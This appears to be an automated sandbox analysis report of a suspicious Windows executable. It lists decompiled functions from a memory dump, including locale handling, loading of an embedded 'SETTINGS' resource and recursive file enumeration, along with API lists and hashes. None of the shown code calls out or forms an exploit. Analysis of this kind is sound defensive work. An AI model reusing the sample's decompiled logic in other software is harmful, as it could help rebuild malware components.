                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t18 = _t18 | 0x00000001;
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                                                					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t25 = _t25 + 4;
                                                                                                					_t36 = _t36 + 4;
                                                                                                					if(_t33 != 0) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				asm("sbb edx, edx");
                                                                                                				_t26 = _t25 | 0x00000001;
                                                                                                				goto L9;
                                                                                                			}

















                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044BC2B,?,00000000), ref: 0044B9A5
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044BC2B,?,00000000), ref: 0044B9CE
                                                                                                • GetACP.KERNEL32(?,?,0044BC2B,?,00000000), ref: 0044B9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: f045e2f8a20af44426dc1fe4fe8b9a83c8f0a3672ebcd683f0f2934e8eb2e5c4
                                                                                                • Instruction ID: 28a97a8de93285a340377b001af7d0fb9ba955f2816ec725b2bfbfcb5361b626
                                                                                                • Opcode Fuzzy Hash: f045e2f8a20af44426dc1fe4fe8b9a83c8f0a3672ebcd683f0f2934e8eb2e5c4
                                                                                                • Instruction Fuzzy Hash: B12106A2600204A6FB348F15C801BABB7A6EF54B54B568026EB49CB300E73ADE41C3D8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00417629(void** __ecx) {
                                                                                                				struct HRSRC__* _t1;
                                                                                                				void* _t3;
                                                                                                				long _t4;
                                                                                                				void** _t5;
                                                                                                				struct HRSRC__* _t7;
                                                                                                
                                                                                                				_t5 = __ecx;
                                                                                                				_t1 = FindResourceA( *0x46dd1c, "SETTINGS", 0xa);
                                                                                                				_t7 = _t1;
                                                                                                				if(_t7 != 0) {
                                                                                                					_t3 = LockResource(LoadResource( *0x46dd1c, _t7));
                                                                                                					_t4 = SizeofResource( *0x46dd1c, _t7);
                                                                                                					 *_t5 = _t3;
                                                                                                					return _t4;
                                                                                                				}
                                                                                                				return _t1;
                                                                                                			}









                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 0041763A
                                                                                                • LoadResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 0041764E
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 00417655
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 00417664
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: eeef2a018f1032e0c24a2081691b2ffd6b8c60c71593df6125c51553ed440201
                                                                                                • Instruction ID: 91499a21751a176828ba935c1427f838fa71bbaa7d48000b3f13d84a7695817a
                                                                                                • Opcode Fuzzy Hash: eeef2a018f1032e0c24a2081691b2ffd6b8c60c71593df6125c51553ed440201
                                                                                                • Instruction Fuzzy Hash: 45E01A76A00710ABCB212BA9AC4CD87BF39E7D9B573210036F91186321EA7588919A29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00407C95(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t81;
                                                                                                				intOrPtr* _t83;
                                                                                                				signed int _t93;
                                                                                                				signed int _t98;
                                                                                                				intOrPtr* _t102;
                                                                                                				signed int _t126;
                                                                                                				signed int _t127;
                                                                                                				signed int _t128;
                                                                                                				signed int _t129;
                                                                                                				void* _t146;
                                                                                                				signed int _t147;
                                                                                                				intOrPtr _t150;
                                                                                                				char* _t171;
                                                                                                				char* _t172;
                                                                                                				char* _t211;
                                                                                                				void* _t215;
                                                                                                				void* _t219;
                                                                                                				void* _t221;
                                                                                                				intOrPtr _t222;
                                                                                                				void* _t223;
                                                                                                				void* _t225;
                                                                                                				void* _t226;
                                                                                                
                                                                                                				_t226 = __eflags;
                                                                                                				_t150 = __ecx;
                                                                                                				E00452248(E004537CC, _t219);
                                                                                                				_t222 = _t221 - 0x308;
                                                                                                				_push(_t146);
                                                                                                				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
                                                                                                				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
                                                                                                				E004020C7(_t146, _t219 - 0x5c);
                                                                                                				_t81 = E004022FC(_t219 + 0x20, _t219 - 0x1c);
                                                                                                				_t83 = E004022BF(_t219 + 0x20, _t219 - 0x20);
                                                                                                				E00408269(_t219 - 0x28,  *((intOrPtr*)(E004022FC(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
                                                                                                				_t223 = _t222 + 0xc;
                                                                                                				_t204 = _t219 + 8;
                                                                                                				_t215 = FindFirstFileW(E00401EDD(E00407677(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
                                                                                                				 *(_t219 - 0x1c) = _t215;
                                                                                                				E00401EE2();
                                                                                                				if(_t215 != 0xffffffff) {
                                                                                                					_t147 = 0;
                                                                                                					__eflags = 0;
                                                                                                					while(1) {
                                                                                                						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
                                                                                                						__eflags = _t93;
                                                                                                						if(_t93 == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t211 =  *((intOrPtr*)(_t219 - 0x18));
                                                                                                						__eflags =  *_t211;
                                                                                                						if( *_t211 == 0) {
                                                                                                							__eflags =  *(_t219 - 0x30c) & 0x00000010;
                                                                                                							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
                                                                                                								L25:
                                                                                                								E00404260(_t147, _t219 - 0x40, _t219 - 0x2e0);
                                                                                                								_t102 = E004022FC(_t219 - 0x40, _t219 - 0x28);
                                                                                                								_t217 = E004022BF(_t219 - 0x40, _t219 - 0x24);
                                                                                                								E00408269(_t219 - 0x44,  *((intOrPtr*)(E004022FC(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
                                                                                                								_t223 = _t223 + 0xc;
                                                                                                								__eflags = E004080DA(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
                                                                                                								if(__eflags == 0) {
                                                                                                									L29:
                                                                                                									E00401EE2();
                                                                                                									_t215 =  *(_t219 - 0x1c);
                                                                                                									continue;
                                                                                                								}
                                                                                                								E00401FC3(_t219 - 0x5c, _t204, _t217, E0040209D(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
                                                                                                								E00401FB9();
                                                                                                								 *(_t219 - 4) = _t147;
                                                                                                								_t223 = _t223 - 0x18;
                                                                                                								_t204 = E00402F85(_t147, _t219 - 0x74, E00417D8C(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x46e250);
                                                                                                								E00402F85(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
                                                                                                								_push(0x66);
                                                                                                								__eflags = E00404BB7(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								if((_t147 & 0xffffff00 | E00404BB7(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
                                                                                                									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
                                                                                                									_t147 = 0;
                                                                                                									__eflags = 0;
                                                                                                									goto L29;
                                                                                                								}
                                                                                                								E00401EE2();
                                                                                                								E00401FB9();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								_t98 = 0;
                                                                                                								L31:
                                                                                                								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
                                                                                                								return _t98;
                                                                                                							}
                                                                                                							_t171 = ".";
                                                                                                							_t126 = _t219 - 0x2e0;
                                                                                                							while(1) {
                                                                                                								_t204 =  *_t126;
                                                                                                								__eflags = _t204 -  *_t171;
                                                                                                								if(_t204 !=  *_t171) {
                                                                                                									break;
                                                                                                								}
                                                                                                								__eflags = _t204;
                                                                                                								if(_t204 == 0) {
                                                                                                									L13:
                                                                                                									_t127 = _t147;
                                                                                                									L15:
                                                                                                									__eflags = _t127;
                                                                                                									if(_t127 == 0) {
                                                                                                										goto L25;
                                                                                                									}
                                                                                                									_t172 = L"..";
                                                                                                									_t128 = _t219 - 0x2e0;
                                                                                                									while(1) {
                                                                                                										_t204 =  *_t128;
                                                                                                										__eflags = _t204 -  *_t172;
                                                                                                										if(_t204 !=  *_t172) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags = _t204;
                                                                                                										if(_t204 == 0) {
                                                                                                											L21:
                                                                                                											_t129 = _t147;
                                                                                                											L23:
                                                                                                											__eflags = _t129;
                                                                                                											if(__eflags != 0) {
                                                                                                												_push(_t172);
                                                                                                												_t204 = E00408293(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E00404260(_t147, _t219 - 0x74, _t219 - 0x2e0));
                                                                                                												E004082B7(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
                                                                                                												E00401EE2();
                                                                                                												E00401EE2();
                                                                                                												_t225 = _t223 - 0x18;
                                                                                                												E004074B3(_t147, _t225, _t132, __eflags, _t219 + 0x20);
                                                                                                												_t223 = _t225 - 0x18;
                                                                                                												E004074B3(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
                                                                                                												E00407C95(_t211, _t204, __eflags);
                                                                                                												E00401EE2();
                                                                                                											}
                                                                                                											goto L25;
                                                                                                										}
                                                                                                										_t204 =  *((intOrPtr*)(_t128 + 2));
                                                                                                										_t29 =  &(_t172[2]); // 0x2e
                                                                                                										__eflags = _t204 -  *_t29;
                                                                                                										if(_t204 !=  *_t29) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t128 = _t128 + 4;
                                                                                                										_t172 =  &(_t172[4]);
                                                                                                										__eflags = _t204;
                                                                                                										if(_t204 != 0) {
                                                                                                											continue;
                                                                                                										}
                                                                                                										goto L21;
                                                                                                									}
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t129 = _t128 | 0x00000001;
                                                                                                									__eflags = _t129;
                                                                                                									goto L23;
                                                                                                								}
                                                                                                								_t204 =  *((intOrPtr*)(_t126 + 2));
                                                                                                								_t26 =  &(_t171[2]); // 0x2e0000
                                                                                                								__eflags = _t204 -  *_t26;
                                                                                                								if(_t204 !=  *_t26) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t126 = _t126 + 4;
                                                                                                								_t171 =  &(_t171[4]);
                                                                                                								__eflags = _t204;
                                                                                                								if(_t204 != 0) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L13;
                                                                                                							}
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t127 = _t126 | 0x00000001;
                                                                                                							__eflags = _t127;
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						FindClose(_t215);
                                                                                                						L6:
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						_t98 = _t147;
                                                                                                						goto L31;
                                                                                                					}
                                                                                                					FindClose(_t215);
                                                                                                					E00401FB9();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					_t98 = 1;
                                                                                                					goto L31;
                                                                                                				}
                                                                                                				_t147 = 1;
                                                                                                				goto L6;
                                                                                                			}




























                                                                                                0x00407f82
                                                                                                0x00407f87
                                                                                                0x00000000
                                                                                                0x00407f87
                                                                                                0x00407ee4
                                                                                                0x00407eec
                                                                                                0x00407ef1
                                                                                                0x00407ef4
                                                                                                0x00407f1b
                                                                                                0x00407f1f
                                                                                                0x00407f25
                                                                                                0x00407f32
                                                                                                0x00407f3b
                                                                                                0x00407f46
                                                                                                0x00407f4d
                                                                                                0x00407f79
                                                                                                0x00407f7d
                                                                                                0x00407f7d
                                                                                                0x00000000
                                                                                                0x00407f7d
                                                                                                0x00407f52
                                                                                                0x00407f5a
                                                                                                0x00407f62
                                                                                                0x00407f6a
                                                                                                0x00407f6f
                                                                                                0x00407fb0
                                                                                                0x00407fb3
                                                                                                0x00407fc0
                                                                                                0x00407fc0
                                                                                                0x00407d84
                                                                                                0x00407d89
                                                                                                0x00407d8f
                                                                                                0x00407d8f
                                                                                                0x00407d92
                                                                                                0x00407d95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407d97
                                                                                                0x00407d9a
                                                                                                0x00407db1
                                                                                                0x00407db1
                                                                                                0x00407dba
                                                                                                0x00407dba
                                                                                                0x00407dbc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407dc2
                                                                                                0x00407dc7
                                                                                                0x00407dcd
                                                                                                0x00407dcd
                                                                                                0x00407dd0
                                                                                                0x00407dd3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407dd5
                                                                                                0x00407dd8
                                                                                                0x00407def
                                                                                                0x00407def
                                                                                                0x00407df8
                                                                                                0x00407df8
                                                                                                0x00407dfa
                                                                                                0x00407dfc
                                                                                                0x00407e1c
                                                                                                0x00407e24
                                                                                                0x00407e30
                                                                                                0x00407e38
                                                                                                0x00407e3d
                                                                                                0x00407e46
                                                                                                0x00407e4b
                                                                                                0x00407e57
                                                                                                0x00407e5e
                                                                                                0x00407e69
                                                                                                0x00407e69
                                                                                                0x00000000
                                                                                                0x00407dfa
                                                                                                0x00407dda
                                                                                                0x00407dde
                                                                                                0x00407dde
                                                                                                0x00407de2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407de4
                                                                                                0x00407de7
                                                                                                0x00407dea
                                                                                                0x00407ded
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407ded
                                                                                                0x00407df3
                                                                                                0x00407df5
                                                                                                0x00407df5
                                                                                                0x00000000
                                                                                                0x00407df5
                                                                                                0x00407d9c
                                                                                                0x00407da0
                                                                                                0x00407da0
                                                                                                0x00407da4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407da6
                                                                                                0x00407da9
                                                                                                0x00407dac
                                                                                                0x00407daf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407daf
                                                                                                0x00407db5
                                                                                                0x00407db7
                                                                                                0x00407db7
                                                                                                0x00000000
                                                                                                0x00407db7
                                                                                                0x00407d52
                                                                                                0x00407d58
                                                                                                0x00407d5b
                                                                                                0x00407d63
                                                                                                0x00407d6b
                                                                                                0x00407d70
                                                                                                0x00000000
                                                                                                0x00407d70
                                                                                                0x00407f90
                                                                                                0x00407f99
                                                                                                0x00407fa1
                                                                                                0x00407fa9
                                                                                                0x00407fae
                                                                                                0x00000000
                                                                                                0x00407fae
                                                                                                0x00407d2d
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407C9A
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407D12
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00407D3B
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                                • String ID:
                                                                                                • API String ID: 3260228402-0
                                                                                                • Opcode ID: 45028a94613e0432cb9e7bb02ccb75b2a04c466909aef4cebea62118aa8bf19e
                                                                                                • Instruction ID: a8c85bca6a8ed267b4c155fb5eebf7722f365f085f43aaf3af661ff30ad9601a
                                                                                                • Opcode Fuzzy Hash: 45028a94613e0432cb9e7bb02ccb75b2a04c466909aef4cebea62118aa8bf19e
                                                                                                • Instruction Fuzzy Hash: 50915E319001199BCB15EBA1CD919EEB379BF50308F10417FE502B71E1EF38AA49CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E0044BAE0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
                                                                                                				signed int _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				char _v20;
                                                                                                				signed int* _v24;
                                                                                                				short* _v28;
                                                                                                				void* __ebp;
                                                                                                				signed int _t39;
                                                                                                				void* _t45;
                                                                                                				signed int* _t46;
                                                                                                				signed int _t47;
                                                                                                				short* _t48;
                                                                                                				int _t49;
                                                                                                				short* _t56;
                                                                                                				short* _t57;
                                                                                                				short* _t58;
                                                                                                				int _t66;
                                                                                                				int _t68;
                                                                                                				short* _t72;
                                                                                                				intOrPtr _t75;
                                                                                                				void* _t77;
                                                                                                				short* _t78;
                                                                                                				intOrPtr _t85;
                                                                                                				short* _t89;
                                                                                                				short* _t92;
                                                                                                				void* _t94;
                                                                                                				short** _t102;
                                                                                                				short* _t103;
                                                                                                				signed int _t105;
                                                                                                				signed short _t108;
                                                                                                				signed int _t109;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				_t39 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t39 ^ _t109;
                                                                                                				_t89 = _a12;
                                                                                                				_t105 = _a4;
                                                                                                				_v28 = _a8;
                                                                                                				_v24 = E00442F68(_t89, __ecx, __edx) + 0x50;
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				_t45 = E00442F68(_t89, __ecx, __edx);
                                                                                                				_t99 = 0;
                                                                                                				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                                                                				_t92 = _t105 + 0x80;
                                                                                                				_t46 = _v24;
                                                                                                				 *_t46 = _t105;
                                                                                                				_t102 =  &(_t46[1]);
                                                                                                				 *_t102 = _t92;
                                                                                                				if(_t92 != 0 &&  *_t92 != 0) {
                                                                                                					_t85 =  *0x45b014; // 0x17
                                                                                                					E0044BA83(0, 0x45af00, _t85 - 1, _t102);
                                                                                                					_t46 = _v24;
                                                                                                					_t110 = _t110 + 0xc;
                                                                                                					_t99 = 0;
                                                                                                				}
                                                                                                				_v20 = _t99;
                                                                                                				_t47 =  *_t46;
                                                                                                				if(_t47 == 0 ||  *_t47 == _t99) {
                                                                                                					_t48 =  *_t102;
                                                                                                					__eflags = _t48;
                                                                                                					if(_t48 == 0) {
                                                                                                						L19:
                                                                                                						_v20 = 0x104;
                                                                                                						_t49 = GetUserDefaultLCID();
                                                                                                						_v12 = _t49;
                                                                                                						_v16 = _t49;
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					__eflags =  *_t48 - _t99;
                                                                                                					if( *_t48 == _t99) {
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					E0044B420(_t92, _t99,  &_v20);
                                                                                                					_pop(_t92);
                                                                                                					goto L20;
                                                                                                				} else {
                                                                                                					_t72 =  *_t102;
                                                                                                					if(_t72 == 0 ||  *_t72 == _t99) {
                                                                                                						E0044B506(_t92, _t99,  &_v20);
                                                                                                					} else {
                                                                                                						E0044B46B(_t92, _t99,  &_v20);
                                                                                                					}
                                                                                                					_pop(_t92);
                                                                                                					if(_v20 != 0) {
                                                                                                						_t103 = 0;
                                                                                                						__eflags = 0;
                                                                                                						goto L25;
                                                                                                					} else {
                                                                                                						_t75 =  *0x45aefc; // 0x41
                                                                                                						_t77 = E0044BA83(_t99, 0x45abf0, _t75 - 1, _v24);
                                                                                                						_t110 = _t110 + 0xc;
                                                                                                						if(_t77 == 0) {
                                                                                                							L20:
                                                                                                							_t103 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L21:
                                                                                                							if(_v20 != 0) {
                                                                                                								L25:
                                                                                                								asm("sbb esi, esi");
                                                                                                								_t108 = E0044B90C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                                                                                                								_pop(_t94);
                                                                                                								__eflags = _t108;
                                                                                                								if(_t108 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								__eflags = _t108 - 0xfde8;
                                                                                                								if(_t108 == 0xfde8) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								__eflags = _t108 - 0xfde9;
                                                                                                								if(_t108 == 0xfde9) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                                                                                                								__eflags = _t56;
                                                                                                								if(_t56 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t57 = IsValidLocale(_v16, 1);
                                                                                                								__eflags = _t57;
                                                                                                								if(_t57 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t58 = _v28;
                                                                                                								__eflags = _t58;
                                                                                                								if(__eflags != 0) {
                                                                                                									 *_t58 = _t108;
                                                                                                								}
                                                                                                								E0044389C(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                                                                                                								__eflags = _t89;
                                                                                                								if(__eflags == 0) {
                                                                                                									L36:
                                                                                                									L23:
                                                                                                									return E00430A5B(_v8 ^ _t109);
                                                                                                								}
                                                                                                								_t33 =  &(_t89[0x90]); // 0x43f6c1
                                                                                                								E0044389C(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
                                                                                                								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                                                                                                								__eflags = _t66;
                                                                                                								if(_t66 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t36 =  &(_t89[0x40]); // 0x43f621
                                                                                                								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                                                                                                								__eflags = _t68;
                                                                                                								if(_t68 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t38 =  &(_t89[0x80]); // 0x43f6a1
                                                                                                								E0043CE14(_t38, _t108, _t38, 0x10, 0xa);
                                                                                                								goto L36;
                                                                                                							}
                                                                                                							L22:
                                                                                                							goto L23;
                                                                                                						}
                                                                                                						_t78 =  *_t102;
                                                                                                						_t103 = 0;
                                                                                                						if(_t78 == 0 ||  *_t78 == 0) {
                                                                                                							E0044B506(_t92, _t99,  &_v20);
                                                                                                						} else {
                                                                                                							E0044B46B(_t92, _t99,  &_v20);
                                                                                                						}
                                                                                                						_pop(_t92);
                                                                                                						goto L21;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044BBEC
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0044BC47
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044BC56
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,0043F5A1,00000040,?,0043F6C1,00000055,00000000,?,?,00000055,00000000), ref: 0044BC9E
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,0043F621,00000040), ref: 0044BCBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: b20f1f30a73e5990f55684d0b63626837e244aef67d160553728402ef271492c
                                                                                                • Instruction ID: 68f7521ddd08404ca6bc68bed0c56ecca10238e2756af2720d9b3fccd52ec889
                                                                                                • Opcode Fuzzy Hash: b20f1f30a73e5990f55684d0b63626837e244aef67d160553728402ef271492c
                                                                                                • Instruction Fuzzy Hash: E1519571A00609ABFB10DFA5CC85ABF73B8EF04705F14406BF914EB251DB78E9408BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E004440B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				int _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				signed int _v56;
                                                                                                				char _v268;
                                                                                                				intOrPtr _v272;
                                                                                                				char _v276;
                                                                                                				char _v312;
                                                                                                				char _v316;
                                                                                                				void* __ebp;
                                                                                                				void* _t36;
                                                                                                				signed int _t38;
                                                                                                				signed int _t42;
                                                                                                				signed int _t50;
                                                                                                				void* _t54;
                                                                                                				void* _t56;
                                                                                                				signed int* _t61;
                                                                                                				intOrPtr _t71;
                                                                                                				void* _t78;
                                                                                                				signed int _t85;
                                                                                                				signed int _t87;
                                                                                                				signed int _t89;
                                                                                                				int _t93;
                                                                                                				char** _t96;
                                                                                                				signed int _t100;
                                                                                                				signed int _t101;
                                                                                                				signed int _t106;
                                                                                                				signed int _t107;
                                                                                                				intOrPtr _t116;
                                                                                                				intOrPtr _t118;
                                                                                                
                                                                                                				_t88 = __edi;
                                                                                                				_t96 = E00443B22();
                                                                                                				_v8 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_t36 = E00443B80( &_v8);
                                                                                                				_pop(_t78);
                                                                                                				if(_t36 != 0) {
                                                                                                					L19:
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					E00437736();
                                                                                                					asm("int3");
                                                                                                					_t106 = _t107;
                                                                                                					_t38 =  *0x46c00c; // 0x4cc22724
                                                                                                					_v56 = _t38 ^ _t106;
                                                                                                					 *0x46c334 =  *0x46c334 | 0xffffffff;
                                                                                                					 *0x46c328 =  *0x46c328 | 0xffffffff;
                                                                                                					_push(0);
                                                                                                					_push(_t96);
                                                                                                					_t77 = "TZ";
                                                                                                					_t89 = 0;
                                                                                                					 *0x46d748 = 0;
                                                                                                					_t42 = E00437B05(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                                                                                                					__eflags = _t42;
                                                                                                					if(_t42 != 0) {
                                                                                                						__eflags = _t42 - 0x22;
                                                                                                						if(_t42 == 0x22) {
                                                                                                							_t101 = E00440C6C(_t78, _v272);
                                                                                                							__eflags = _t101;
                                                                                                							if(__eflags != 0) {
                                                                                                								_t50 = E00437B05(__eflags,  &_v276, _t101, _v272, _t77);
                                                                                                								__eflags = _t50;
                                                                                                								if(_t50 == 0) {
                                                                                                									E004414D5(0);
                                                                                                									_t89 = _t101;
                                                                                                								} else {
                                                                                                									_push(_t101);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_push(0);
                                                                                                								L25:
                                                                                                								E004414D5();
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t89 =  &_v268;
                                                                                                					}
